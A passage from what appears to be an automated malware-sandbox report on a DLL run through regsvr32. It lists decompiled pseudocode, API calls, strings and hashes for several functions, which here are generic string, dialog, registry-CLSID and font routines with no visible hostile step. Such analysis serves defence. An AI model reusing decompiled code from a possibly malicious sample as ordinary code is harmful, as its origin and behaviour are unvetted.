								__eflags =  *(_t192 - 0x3c);
								if(__eflags != 0) {
									_push(_t183);
									E100107C8(0, _t183, _t186, __eflags);
								}
								goto L61;
							}
							 *(_t192 - 4) = 0;
							E10010B20(_t126 + 0x00000003 & 0xfffffffc, _t175);
							 *(_t192 - 0x18) = _t195;
							_t183 = _t195;
							 *(_t192 - 0x44) = _t183;
							E10011C50(_t183, 0, _t187);
							_t196 =  &(_t195[0xc]);
							 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
							__eflags = _t183;
							if(_t183 != 0) {
								L54:
								_t132 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x28),  *(_t192 + 0x14), _t183,  *(_t192 - 0x24));
								 *(_t192 - 0x24) = _t132;
								__eflags = _t132;
								if(__eflags != 0) {
									_push( *(_t192 + 0x1c));
									_push( *(_t192 + 0x18));
									_push(_t192 - 0x24);
									_push(_t183);
									_push( *(_t192 + 0x20));
									_push( *((intOrPtr*)(_t192 - 0x40)));
									_t134 = E1001A487(0, _t183, _t187, __eflags);
									asm("sbb esi, esi");
									_t186 =  ~( ~_t134);
									goto L58;
								}
								goto L55;
							} else {
								_t183 = E100107B6( *(_t192 - 0x24));
								__eflags = _t183;
								if(_t183 == 0) {
									L55:
									_t186 = 0;
									goto L58;
								}
								E10011C50(_t183, 0,  *(_t192 - 0x24));
								_t196 =  &(_t196[0xc]);
								 *(_t192 - 0x3c) = 1;
								goto L54;
							}
						} else {
							goto L46;
						}
					} else {
						if(_t119 != 1) {
							L46:
							_t122 = 0;
							L64:
							return E1001254F(_t122);
						}
						_t184 = 0;
						 *(_t192 - 0x2c) = 0;
						 *(_t192 - 0x38) = 0;
						 *(_t192 - 0x34) = 0;
						if( *(_t192 + 0x20) == 0) {
							_t164 =  *0x1004f734; // 0x0
							 *(_t192 + 0x20) = _t164;
						}
						_t190 = MultiByteToWideChar( *(_t192 + 0x20), 1 + (0 |  *((intOrPtr*)(_t192 + 0x24)) != 0x00000000) * 8,  *(_t192 + 0x10),  *(_t192 + 0x14), 0, 0);
						 *(_t192 - 0x30) = _t190;
						if(_t190 == 0) {
							goto L46;
						} else {
							 *(_t192 - 4) = 1;
							E10010B20(_t190 + _t190 + 0x00000003 & 0xfffffffc, _t172);
							 *(_t192 - 0x18) = _t193;
							 *(_t192 - 0x1c) = _t193;
							 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
							if( *(_t192 - 0x1c) != 0) {
								L21:
								if(MultiByteToWideChar( *(_t192 + 0x20), 1,  *(_t192 + 0x10),  *(_t192 + 0x14),  *(_t192 - 0x1c), _t190) == 0) {
									L36:
									_t219 =  *(_t192 - 0x34);
									if( *(_t192 - 0x34) != 0) {
										_push( *(_t192 - 0x20));
										E100107C8(0, _t184, _t190, _t219);
									}
									_t220 =  *(_t192 - 0x38);
									if( *(_t192 - 0x38) != 0) {
										_push( *(_t192 - 0x1c));
										E100107C8(0, _t184, _t190, _t220);
									}
									_t122 = _t184;
									goto L64;
								}
								_t184 = LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190, 0, 0);
								 *(_t192 - 0x2c) = _t184;
								if(_t184 == 0) {
									goto L36;
								}
								if(( *(_t192 + 0xd) & 0x00000004) == 0) {
									 *(_t192 - 4) = 2;
									E10010B20(_t184 + _t184 + 0x00000003 & 0xfffffffc, _t172);
									 *(_t192 - 0x18) = _t193;
									 *(_t192 - 0x20) = _t193;
									 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
									__eflags =  *(_t192 - 0x20);
									if( *(_t192 - 0x20) != 0) {
										L31:
										__eflags = LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190,  *(_t192 - 0x20), _t184);
										if(__eflags != 0) {
											_push(0);
											_push(0);
											__eflags =  *(_t192 + 0x1c);
											if(__eflags != 0) {
												_push( *(_t192 + 0x1c));
												_push( *(_t192 + 0x18));
											} else {
												_push(0);
												_push(0);
											}
											_t184 = WideCharToMultiByte( *(_t192 + 0x20), 0,  *(_t192 - 0x20), _t184, ??, ??, ??, ??);
										}
										goto L36;
									} else {
										_t160 = E100107B6(_t184 + _t184);
										 *(_t192 - 0x20) = _t160;
										__eflags = _t160;
										if(__eflags == 0) {
											goto L36;
										}
										 *(_t192 - 0x34) = 1;
										goto L31;
									}
								}
								if( *(_t192 + 0x1c) != 0 && _t184 <=  *(_t192 + 0x1c)) {
									LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190,  *(_t192 + 0x18),  *(_t192 + 0x1c));
								}
								goto L36;
							} else {
								_t163 = E100107B6(_t190 + _t190);
								_pop(_t172);
								 *(_t192 - 0x1c) = _t163;
								if(_t163 == 0) {
									goto L46;
								}
								 *(_t192 - 0x38) = 1;
								goto L21;
							}
						}
					}
				}
				_t181 =  *(_t192 + 0x14);
				_t165 =  *(_t192 + 0x10);
				while(1) {
					_t172 = _t181 - 1;
					if( *_t165 == 0) {
						break;
					}
					_t165 = _t165 + 1;
					if(_t172 != 0) {
						continue;
					}
					_t172 = _t172 | 0xffffffff;
					break;
				}
				 *(_t192 + 0x14) =  *(_t192 + 0x14) + (_t165 | 0xffffffff) - _t172;
				goto L11;
			}

0x10018081
0x10018081
0x10018083
0x10018088
0x1001808f
0x10018095
0x1001809b
0x100180b0
0x100180ba
0x100180c0
0x100180c3
0x100180c5
0x100180c5
0x100180b2
0x100180b2
0x100180b2
0x100180b0
0x100180d2
0x100180ef
0x100180ef
0x100180f7
0x100182d9
0x100182dc
0x100182de
0x100182e1
0x100182e4
0x100182e6
0x100182eb
0x100182eb
0x100182ee
0x100182f1
0x100182f3
0x100182f8
0x100182f8
0x100182fe
0x10018304
0x10018307
0x1001830a
0x10018313
0x10018316
0x10018422
0x10018424
0x10018424
0x10018427
0x10018429
0x1001842c
0x10018431
0x10018432
0x00000000
0x10018432
0x1001831c
0x1001831d
0x1001831e
0x10018321
0x10018322
0x10018325
0x10018326
0x10018329
0x1001832e
0x10018331
0x10018334
0x10018336
0x00000000
0x00000000
0x1001834a
0x1001834c
0x1001834f
0x10018351
0x100183f9
0x100183fc
0x100183fc
0x100183ff
0x10018401
0x10018402
0x10018407
0x00000000
0x100183ff
0x10018357
0x10018360
0x10018365
0x10018368
0x1001836a
0x10018370
0x10018375
0x1001838a
0x1001838e
0x10018390
0x100183b5
0x100183c5
0x100183cb
0x100183ce
0x100183d0
0x100183d6
0x100183d9
0x100183df
0x100183e0
0x100183e1
0x100183e4
0x100183e7
0x100183f3
0x100183f5
0x00000000
0x100183f5
0x00000000
0x10018392
0x1001839b
0x1001839d
0x1001839f
0x100183d2
0x100183d2
0x00000000
0x100183d2
0x100183a6
0x100183ab
0x100183ae
0x00000000
0x100183ae
0x00000000
0x00000000
0x00000000
0x10018105
0x10018108
0x1001830c
0x1001830c
0x10018434
0x1001843c
0x1001843c
0x1001810e
0x10018110
0x10018113
0x10018116
0x1001811c
0x1001811e
0x10018123
0x10018123
0x10018147
0x10018149
0x1001814e
0x00000000
0x10018154
0x10018154
0x10018164
0x10018169
0x1001816e
0x10018171
0x10018195
0x100181b3
0x100181ca
0x100182b6
0x100182b6
0x100182b9
0x100182bb
0x100182be
0x100182c3
0x100182c4
0x100182c7
0x100182c9
0x100182cc
0x100182d1
0x100182d2
0x00000000
0x100182d2
0x100181e2
0x100181e4
0x100181e9
0x00000000
0x00000000
0x100181f3
0x10018222
0x10018232
0x10018237
0x1001823c
0x1001823f
0x10018260
0x10018263
0x1001827d
0x10018291
0x10018293
0x10018295
0x10018296
0x10018297
0x1001829a
0x100182a0
0x100182a3
0x1001829c
0x1001829c
0x1001829d
0x1001829d
0x100182b4
0x100182b4
0x00000000
0x10018265
0x10018269
0x1001826f
0x10018272
0x10018274
0x00000000
0x00000000
0x10018276
0x00000000
0x10018276
0x10018263
0x100181f8
0x10018217
0x10018217
0x00000000
0x10018197
0x1001819b
0x100181a0
0x100181a1
0x100181a6
0x00000000
0x00000000
0x100181ac
0x00000000
0x100181ac
0x10018195
0x1001814e
0x100180f7
0x100180d4
0x100180d7
0x100180da
0x100180da
0x100180dd
0x00000000
0x00000000
0x100180df
0x100180e2
0x00000000
0x00000000
0x100180e4
0x00000000
0x100180e4
0x100180ec
0x00000000

APIs

LCMapStringW.KERNEL32(00000000,00000100,10042704,00000001,00000000,00000000,10042708,00000038,10012971,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 100180A8
GetLastError.KERNEL32 ref: 100180BA
MultiByteToWideChar.KERNEL32(?,00000000,10012C1E,?,00000000,00000000,10042708,00000038,10012971,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 10018141
MultiByteToWideChar.KERNEL32(?,00000001,10012C1E,?,?,00000000), ref: 100181C2
LCMapStringW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 100181DC
LCMapStringW.KERNEL32(00000000,00000000,?,00000000,?,?), ref: 10018217

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: String$ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1775797328-0
Opcode ID: 2a0531d2a3256dac13ccc396c07934314eadd6156838d5e530a716c7ff313fc5
Instruction ID: 011406151073c2933195e68419e397d46f3af982358df5fa752d459d02b2d26b
Opcode Fuzzy Hash: 2a0531d2a3256dac13ccc396c07934314eadd6156838d5e530a716c7ff313fc5
Instruction Fuzzy Hash: 3CB1467280025AEFDF12DFA0DC858DE7BB6FB09394F118229F910AA161D735DBA1DB50

Uniqueness

Uniqueness Score: -1.00%

Function 1001F2DE Relevance: 16.6, APIs: 11, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E1001F2DE(intOrPtr* __ecx) {
				signed int _t45;
				void* _t49;
				CHAR* _t50;
				signed int _t54;
				signed char _t60;
				struct HWND__* _t62;
				CHAR* _t63;
				signed int _t68;
				struct HINSTANCE__* _t81;
				void* _t83;
				intOrPtr* _t85;
				void* _t87;
				void* _t89;

				E10011BF0(0x1003a3e8, _t87);
				_t85 = __ecx;
				_t68 =  *(__ecx + 0x5c);
				 *((intOrPtr*)(_t87 - 0x10)) = _t89 - 0x18;
				 *((intOrPtr*)(_t87 - 0x1c)) = __ecx;
				 *(_t87 - 0x18) =  *(__ecx + 0x58);
				_t45 = E100373B5();
				_t81 =  *(_t45 + 0xc);
				if( *(_t85 + 0x54) != 0) {
					_t81 =  *(E100373B5() + 0xc);
					_t45 = LoadResource(_t81, FindResourceA(_t81,  *(_t85 + 0x54), 5));
					 *(_t87 - 0x18) = _t45;
				}
				if( *(_t87 - 0x18) != 0) {
					_t45 = LockResource( *(_t87 - 0x18));
					_t68 = _t45;
				}
				if(_t68 != 0) {
					 *(_t87 - 0x14) = E1001EE1E(_t85);
					E10022196();
					 *(_t87 - 0x20) =  *(_t87 - 0x20) & 0x00000000;
					__eflags =  *(_t87 - 0x14);
					if( *(_t87 - 0x14) != 0) {
						_t62 = GetDesktopWindow();
						__eflags =  *(_t87 - 0x14) - _t62;
						if( *(_t87 - 0x14) != _t62) {
							_t63 = IsWindowEnabled( *(_t87 - 0x14));
							__eflags = _t63;
							if(_t63 != 0) {
								EnableWindow( *(_t87 - 0x14), 0);
								 *(_t87 - 0x20) = 1;
							}
						}
					}
					 *(_t87 - 4) =  *(_t87 - 4) & 0x00000000;
					_push(_t85);
					E100237EE();
					_t49 = E100220EE(_t87,  *(_t87 - 0x14));
					_push(_t81);
					_push(_t49);
					_push(_t68);
					_t50 = E1001F0D1(_t85);
					__eflags = _t50;
					if(_t50 != 0) {
						__eflags =  *(_t85 + 0x38) & 0x00000010;
						if(( *(_t85 + 0x38) & 0x00000010) != 0) {
							_t83 = 4;
							_t60 = E100202AB(_t85);
							__eflags = _t60 & 0x00000001;
							if((_t60 & 0x00000001) != 0) {
								_t83 = 5;
							}
							E10021B92(_t85, _t83);
						}
						__eflags =  *(_t85 + 0x1c);
						if( *(_t85 + 0x1c) != 0) {
							E100204FE(_t85, 0, 0, 0, 0, 0, 0x97);
						}
					}
					 *(_t87 - 4) =  *(_t87 - 4) | 0xffffffff;
					__eflags =  *(_t87 - 0x20);
					if( *(_t87 - 0x20) != 0) {
						EnableWindow( *(_t87 - 0x14), 1);
					}
					__eflags =  *(_t87 - 0x14);
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *(_t85 + 0x1c);
						if(__eflags == 0) {
							SetActiveWindow( *(_t87 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t85 + 0x60))();
					E1001EE58(_t85, __eflags);
					__eflags =  *(_t85 + 0x54);
					if( *(_t85 + 0x54) != 0) {
						FreeResource( *(_t87 - 0x18));
					}
					_t54 =  *(_t85 + 0x40);
				} else {
					_t54 = _t45 | 0xffffffff;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t87 - 0xc));
				return _t54;
			}

0x1001f2e3
0x1001f2ed
0x1001f2f2
0x1001f2f6
0x1001f2f9
0x1001f2fc
0x1001f2ff
0x1001f308
0x1001f30b
0x1001f312
0x1001f323
0x1001f329
0x1001f329
0x1001f330
0x1001f335
0x1001f33b
0x1001f33b
0x1001f33f
0x1001f350
0x1001f353
0x1001f358
0x1001f35c
0x1001f360
0x1001f362
0x1001f368
0x1001f36b
0x1001f370
0x1001f376
0x1001f378
0x1001f37f
0x1001f385
0x1001f385
0x1001f378
0x1001f36b
0x1001f38c
0x1001f390
0x1001f391
0x1001f399
0x1001f39e
0x1001f39f
0x1001f3a0
0x1001f3a3
0x1001f3aa
0x1001f3ac
0x1001f3ae
0x1001f3b2
0x1001f3b6
0x1001f3b9
0x1001f3be
0x1001f3c1
0x1001f3c5
0x1001f3c5
0x1001f3c9
0x1001f3c9
0x1001f3ce
0x1001f3d1
0x1001f3df
0x1001f3df
0x1001f3d1
0x1001f400
0x1001f404
0x1001f407
0x1001f40e
0x1001f40e
0x1001f414
0x1001f417
0x1001f41f
0x1001f422
0x1001f427
0x1001f427
0x1001f422
0x1001f431
0x1001f436
0x1001f43b
0x1001f43e
0x1001f443
0x1001f443
0x1001f449
0x1001f341
0x1001f341
0x1001f341
0x1001f451
0x1001f45a

APIs

__EH_prolog.LIBCMT ref: 1001F2E3
FindResourceA.KERNEL32(?,00000000,00000005), ref: 1001F31B
LoadResource.KERNEL32(?,00000000,?,?,?,?,?,?,?,00000064,00000000), ref: 1001F323

Part of subcall function 10022196: UnhookWindowsHookEx.USER32(?), ref: 100221BB

LockResource.KERNEL32(00000000,?,?,?,?,?,?,?,00000064,00000000), ref: 1001F335
GetDesktopWindow.USER32 ref: 1001F362
IsWindowEnabled.USER32(00000000), ref: 1001F370
EnableWindow.USER32(00000000,00000000), ref: 1001F37F
EnableWindow.USER32(00000000,00000001), ref: 1001F40E
GetActiveWindow.USER32 ref: 1001F419
SetActiveWindow.USER32(00000000,?,?,?,?,?,?,?,?,00000064,00000000), ref: 1001F427
FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000064,00000000), ref: 1001F443

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Resource$ActiveEnable$DesktopEnabledFindFreeH_prologHookLoadLockUnhookWindows
String ID:
API String ID: 833315621-0
Opcode ID: 36a7553cafaefb879fb01c6852922989da2301ce548023a2a0f367a123b38a93
Instruction ID: 07bae71fa05b1da8482edcdebb19160d7d4844d0efed804ca524429d20d1f7a4
Opcode Fuzzy Hash: 36a7553cafaefb879fb01c6852922989da2301ce548023a2a0f367a123b38a93
Instruction Fuzzy Hash: D14190359007199FDB12DFA5C889BBEB7F5FF14751F10011DF102AA1A2CB74AA81CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1002583A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 68
registryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E1002583A(void* _a4, intOrPtr _a8) {
				void* _v8;
				void* _v12;
				int _v16;
				char* _v20;
				int _v24;
				void* __ebx;
				void* __edi;
				signed int _t35;
				void* _t37;
				void* _t42;
				int* _t43;

				_t43 = 0;
				_v12 = 0;
				_v20 = E100017D0(_a8, 0x104);
				_v16 = 0x104;
				_t42 = RegOpenKeyA;
				_v24 = 0;
				if(RegOpenKeyA(0x80000000, ?str?,  &_v12) == 0) {
					_push(_t37);
					_v8 = 0;
					if(RegOpenKeyA(_v12, _a4,  &_v8) == 0) {
						_a4 = 0;
						if(RegOpenKeyA(_v8, "InProcServer32",  &_a4) == 0) {
							_t35 = RegQueryValueExA(_a4, 0x1003da51, 0,  &_v24, _v20,  &_v16);
							asm("sbb esi, esi");
							_t43 =  ~_t35 + 1;
							RegCloseKey(_a4);
						}
						RegCloseKey(_v8);
					}
					RegCloseKey(_v12);
					_pop(_t37);
				}
				E10006CE2(_t37, _a8, _t42, 0xffffffff);
				return _t43;
			}

0x1002584a
0x1002584d
0x10025855
0x10025861
0x10025864
0x1002586f
0x10025876
0x10025878
0x10025880
0x10025890
0x1002589e
0x100258a5
0x100258bb
0x100258c8
0x100258ca
0x100258cb
0x100258cb
0x100258d0
0x100258d0
0x100258d5
0x100258d7
0x100258d7
0x100258dd
0x100258e7

APIs

RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 10025872
RegOpenKeyA.ADVAPI32(?,?,?), ref: 10025886
RegOpenKeyA.ADVAPI32(?,InProcServer32,?), ref: 100258A1
RegQueryValueExA.ADVAPI32(?,1003DA51,00000000,?,?,?), ref: 100258BB
RegCloseKey.ADVAPI32(?), ref: 100258CB
RegCloseKey.ADVAPI32(?), ref: 100258D0
RegCloseKey.ADVAPI32(?), ref: 100258D5

Strings

CLSID, xrefs: 1002585C
InProcServer32, xrefs: 10025896

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CloseOpen$QueryValue
String ID: CLSID$InProcServer32
API String ID: 3523390698-323508013
Opcode ID: 0f9c6b5e3f4a76f5fb44a6b70cf5269a04b4aae784ef91a0774247bb7487627f
Instruction ID: 98c4733b419a9a9fcc8d3b331f1c0e54a211d8c73680194401ba1897b1518396
Opcode Fuzzy Hash: 0f9c6b5e3f4a76f5fb44a6b70cf5269a04b4aae784ef91a0774247bb7487627f
Instruction Fuzzy Hash: A511297680012DBFEF02EFA5CC80DEEBBB9EF446A0F114122FA05A6150D7719B51DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 10036531 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10036531() {
				struct HWND__* _v4;
				void* _v68;
				void* _v76;
				int _t4;
				int _t10;
				struct HDC__* _t15;
				void* _t18;

				_t4 =  *0x1004b8cc; // 0xffffffff
				if(_t4 == 0xffffffff) {
					_t15 = GetDC(0);
					_v4 = 0;
					_t18 = CreateFontA(GetSystemMetrics(0x48), 0, 0, 0, 0x190, 0, 0, 0, 2, 0, 0, 0, 0, "Marlett");
					if(_t18 != 0) {
						_v68 = SelectObject(_t15, _t18);
					}
					GetCharWidthA(_t15, 0x36, 0x36, 0x1004b8cc);
					if(_t18 != 0) {
						SelectObject(_t15, _v76);
						DeleteObject(_t18);
					}
					ReleaseDC(0, _t15);
					_t10 =  *0x1004b8cc; // 0xffffffff
					return _t10;
				}
				return _t4;
			}

0x10036532
0x1003653a
0x10036561
0x10036563
0x1003657a
0x1003657e
0x10036584
0x10036584
0x10036592
0x1003659a
0x100365a1
0x100365a4
0x100365a4
0x100365ac
0x100365b2
0x00000000
0x100365ba
0x100365bc

APIs

GetDC.USER32(00000000), ref: 10036543
GetSystemMetrics.USER32 ref: 10036567
CreateFontA.GDI32(00000000,?,?,?,?,?,10036A10,?,?,?,?,?,?,?), ref: 1003656E
SelectObject.GDI32(00000000,00000000), ref: 10036582
GetCharWidthA.GDI32(00000000,00000036,00000036,1004B8CC), ref: 10036592
SelectObject.GDI32(00000000,?), ref: 100365A1
DeleteObject.GDI32(00000000), ref: 100365A4
ReleaseDC.USER32 ref: 100365AC

Strings

Marlett, xrefs: 10036549

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Object$Select$CharCreateDeleteFontMetricsReleaseSystemWidth
String ID: Marlett
API String ID: 1397664628-3688754224
Opcode ID: 02a284a0c2a362a437aa0b11f12343519aacb4f4528957fd96303176c2f861e5
Instruction ID: 1088ce7175f154466d6028c012866e6bff604f09a65bd199e6d5657c5750c08b
Opcode Fuzzy Hash: 02a284a0c2a362a437aa0b11f12343519aacb4f4528957fd96303176c2f861e5
Instruction Fuzzy Hash: 5D014071542634BFE2269B668C8CD9B7FACEF467E5F104518F209DA152CB614900CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 1003982F Relevance: 15.2, APIs: 10, Instructions: 181
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E1003982F(void* __ecx) {
				intOrPtr _t52;
				intOrPtr _t53;
				void* _t57;
				CHAR* _t60;
				CHAR* _t88;
				CHAR* _t89;
				void* _t102;
				CHAR* _t103;
				CHAR* _t105;
				CHAR* _t106;
				CHAR* _t107;
				void* _t111;
				short* _t112;
				void* _t122;
				void* _t127;
				void* _t129;
				void* _t131;

				_t127 = _t129 - 0x8c;
				_t52 =  *0x1004c470; // 0xf256d946
				 *((intOrPtr*)(_t127 + 0x88)) = _t52;
				_t53 =  *0x1004b0a0(_t111, _t122, _t102);
				_t112 =  *((intOrPtr*)(_t127 + 0x94));
				 *((intOrPtr*)(_t127 - 0x7c)) = _t53;
				E10011C50(_t112, 0, 0x20);
				_t103 =  *(_t127 + 0x98);
				_t131 = _t129 - 0x10c + 0xc;
				_t109 = _t103;
				 *(_t127 - 0x80) = _t127 - 0x78;
				if(E100244DE(_t103, 0x100410f8) == 0) {
					_t109 = _t103;
					_t57 = E100244DE(_t103, 0x1003d114);
					_push(0x100);
					_push(_t127 - 0x78);
					if(_t57 == 0) {
						_push(0xf108);
						E100245D3();
						 *_t112 = 0xf108;
						L12:
						_t60 = 0;
						if( *(_t127 - 0x80) == 0) {
							L14:
							__imp__#2(_t60);
							 *(_t112 + 8) = _t60;
							if( *(_t112 + 4) == 0) {
								_t106 =  *(E100373B5() + 0x10);
								if(_t106 != 0) {
									_t115 = lstrlenA(_t106) + 1;
									E10010B20(lstrlenA(_t106) + 0x00000001 + lstrlenA(_t106) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
									_t60 = E100067FA(_t131, _t106, _t115,  *((intOrPtr*)(_t127 - 0x7c)));
									_t112 =  *((intOrPtr*)(_t127 + 0x94));
								} else {
									_t60 = 0;
								}
								__imp__#2(_t60);
								 *(_t112 + 4) = _t60;
							}
							if( *(_t112 + 0xc) == 0 &&  *(_t112 + 0x10) != 0) {
								_t105 =  *( *((intOrPtr*)(E100373B5() + 4)) + 0x60);
								if(_t105 != 0) {
									_t126 = lstrlenA(_t105) + 1;
									E10010B20(lstrlenA(_t105) + 0x00000001 + lstrlenA(_t105) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
									_t60 = E100067FA(_t131, _t105, _t126,  *((intOrPtr*)(_t127 - 0x7c)));
								} else {
									_t60 = 0;
								}
								__imp__#2(_t60);
								 *(_t112 + 0xc) = _t60;
							}
							return E100117AE(_t60,  *((intOrPtr*)(_t127 + 0x88)));
						}
						L13:
						_t117 = lstrlenA( *(_t127 - 0x80)) + 1;
						E10010B20(lstrlenA( *(_t127 - 0x80)) + 0x00000001 + lstrlenA( *(_t127 - 0x80)) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
						_t60 = E100067FA(_t131,  *(_t127 - 0x80), _t117,  *((intOrPtr*)(_t127 - 0x7c)));
						_t112 =  *((intOrPtr*)(_t127 + 0x94));
						goto L14;
					}
					_push(0xf10a);
					E100245D3();
					 *_t112 = 0xf10a;
					goto L13;
				}
				 *(_t127 - 0x80) = _t103[0xc];
				 *_t112 = _t103[8];
				 *(_t112 + 0x10) = _t103[0x10];
				 *(_t112 + 0x1c) = _t103[0x1c];
				_t88 = _t103[0x14];
				 *(_t127 + 0x98) = _t88;
				if( *((intOrPtr*)(_t88 - 0xc)) != 0) {
					if(_t88 != 0) {
						_t121 = lstrlenA(_t88) + 1;
						E10010B20(lstrlenA(_t88) + 0x00000001 + lstrlenA(_t88) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
						_t88 = E100067FA(_t131,  *(_t127 + 0x98), _t121,  *((intOrPtr*)(_t127 - 0x7c)));
						_t112 =  *((intOrPtr*)(_t127 + 0x94));
					}
					__imp__#2(_t88);
					 *(_t112 + 0xc) = _t88;
				}
				_t107 = _t103[0x18];
				_t89 = 0;
				if( *((intOrPtr*)(_t107 - 0xc)) != 0) {
					if(_t107 != 0) {
						_t119 = lstrlenA(_t107) + 1;
						E10010B20(lstrlenA(_t107) + 0x00000001 + lstrlenA(_t107) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
						_t89 = E100067FA(_t131, _t107, _t119,  *((intOrPtr*)(_t127 - 0x7c)));
						_t112 =  *((intOrPtr*)(_t127 + 0x94));
					}
					__imp__#2(_t89);
					 *(_t112 + 4) = _t89;
				}
				goto L12;
			}

0x10039830
0x1003983d
0x10039845
0x1003984b
0x10039851
0x1003985c
0x1003985f
0x10039864
0x1003986a
0x10039875
0x10039877
0x10039887
0x10039935
0x10039937
0x1003993e
0x10039946
0x10039947
0x1003995a
0x1003995f
0x10039964
0x10039969
0x10039969
0x1003996e
0x1003999b
0x1003999c
0x100399a6
0x100399a9
0x100399b0
0x100399b5
0x100399c0
0x100399ca
0x100399d7
0x100399dc
0x100399b7
0x100399b7
0x100399b7
0x100399e3
0x100399e9
0x100399e9
0x100399f0
0x10039a00
0x10039a05
0x10039a10
0x10039a1a
0x10039a27
0x10039a07
0x10039a07
0x10039a07
0x10039a2d
0x10039a33
0x10039a33
0x10039a51
0x10039a51
0x10039970
0x10039977
0x10039981
0x10039990
0x10039995
0x00000000
0x10039995
0x10039949
0x1003994e
0x10039953
0x00000000
0x10039953
0x10039890
0x10039897
0x1003989d
0x100398a3
0x100398a6
0x100398ad
0x100398b3
0x100398b7
0x100398be
0x100398c8
0x100398da
0x100398df
0x100398df
0x100398e6
0x100398ec
0x100398ec
0x100398ef
0x100398f2
0x100398f7
0x100398fb
0x10039902
0x1003990c
0x10039919
0x1003991e
0x1003991e
0x10039925
0x1003992b
0x1003992b
0x00000000

APIs

lstrlenA.KERNEL32(?,100410F8), ref: 100398BA

Part of subcall function 100067FA: MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,?,?), ref: 1000681C

SysAllocString.OLEAUT32(?), ref: 100398E6
lstrlenA.KERNEL32(?,100410F8), ref: 100398FE
SysAllocString.OLEAUT32(00000000), ref: 10039925
lstrlenA.KERNEL32(?,0000F108,?,00000100,1003D114,100410F8), ref: 10039973
SysAllocString.OLEAUT32(00000000), ref: 1003999C
lstrlenA.KERNEL32(?), ref: 100399BC
SysAllocString.OLEAUT32(00000000), ref: 100399E3
lstrlenA.KERNEL32(?), ref: 10039A0C
SysAllocString.OLEAUT32(00000000), ref: 10039A2D

